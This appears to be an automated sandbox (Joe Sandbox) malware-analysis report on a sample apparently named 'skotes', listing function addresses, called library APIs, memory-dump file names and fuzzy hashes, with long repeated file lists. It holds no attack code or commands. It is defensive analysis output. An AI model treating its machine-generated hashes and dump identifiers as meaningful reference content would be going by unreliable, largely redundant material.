Instruction Fuzzy Hash: 37817871E002259FCB08CFA8C584A6DB7F6FF89304F1586ADE445AB702DB34AD52CB80

Function 007AEC48 Relevance: 6.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 007AEC81

Part of subcall function 007A8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 007A8F50

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 007AECE7
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 007AECFF
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 007AED0C

Part of subcall function 007AE7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 007AE7D7
Part of subcall function 007AE7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 007AE86F
Part of subcall function 007AE7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 007AE879
Part of subcall function 007AE7AF: Concurrency::location::_Assign.LIBCMT ref: 007AE8AD
Part of subcall function 007AE7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 007AE8B5

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 537443d8a4d19eb2e72d36c853d1ae1304ba8621087a32b5bd7bfe44c3a4ff70
Instruction ID: f4153978ef90b5e883ba26f1e04e172897687438527517401e5a2c10930b3ae2
Opcode Fuzzy Hash: 537443d8a4d19eb2e72d36c853d1ae1304ba8621087a32b5bd7bfe44c3a4ff70
Instruction Fuzzy Hash: 3F51A531A01205EFCF24DF60C899BADB775EF85310F158169E9067B396CB78AE05CBA1

Function 0079CB97 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 0079CBAA

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: abd4a547c94ff981b129a32ee52978f4679d5981bc153406a3618fe538043846
Instruction ID: 781ee6303d977e359de3a83f93a5c632e0651c186dc7cb6e1d62c096602ecc0c
Opcode Fuzzy Hash: abd4a547c94ff981b129a32ee52978f4679d5981bc153406a3618fe538043846
Instruction Fuzzy Hash: 8AB09232A1383447CE522B14BC4869D7768AA84F1130A9156D801AB2248A192E824BDC

Function 0079DD91 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 041bb8124cb9a17c88949b6dbf1b1a2c98a462071e852060c5941a3a15defa69
Instruction ID: 39d684943e75435760fb68d69cafd24efd3b16b873fc6d921cb31f8006e1af20
Opcode Fuzzy Hash: 041bb8124cb9a17c88949b6dbf1b1a2c98a462071e852060c5941a3a15defa69
Instruction Fuzzy Hash: 4B518CB2E026068BDB25CF58E8C57AABBF1FB58304F24C56AD405EB251D378AE40CF54

Function 0079F028 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0079F2BB

Strings

pEvents, xrefs: 0079F2B3

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pEvents
API String ID: 2141394445-2498624650
Opcode ID: 715f47d339c03ce9d68f3f66742c7f09caf8e9f20cb26cc9a91549ca349b2470
Instruction ID: 39063cc2f3ee51c0538ac9412ecc8c284ea919e7e67455bb3ac316f7e8585913
Opcode Fuzzy Hash: 715f47d339c03ce9d68f3f66742c7f09caf8e9f20cb26cc9a91549ca349b2470
Instruction Fuzzy Hash: E4817A31D00219DBCF25DFA8E985BAEB7B5BF45310F244529E401EB282DB3CAE45CB91

Function 007B26D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 007B26E3

Part of subcall function 007B24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007B2504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 007B2704
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 007B2711
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 007B275F
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 007B27E6
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 007B27F9
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 007B2846

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 34bc7790c5968056db25710d7d4cdc4a9a826e0c933eada0666e23b4fdff83ea
Instruction ID: dc7d73fea3fb55995d778f77b05238de34fdd0feeeab503b517199bc59589f5a
Opcode Fuzzy Hash: 34bc7790c5968056db25710d7d4cdc4a9a826e0c933eada0666e23b4fdff83ea
Instruction Fuzzy Hash: 9581BC30901249EBDF169F54C994BFE7BB2AF56304F040098ED417B263CB3A9D26DB61

Function 007B2970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 007B2982

Part of subcall function 007B24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007B2504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 007B29A3
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 007B29B0
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 007B29FE
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 007B2AA6
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 007B2AD8

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
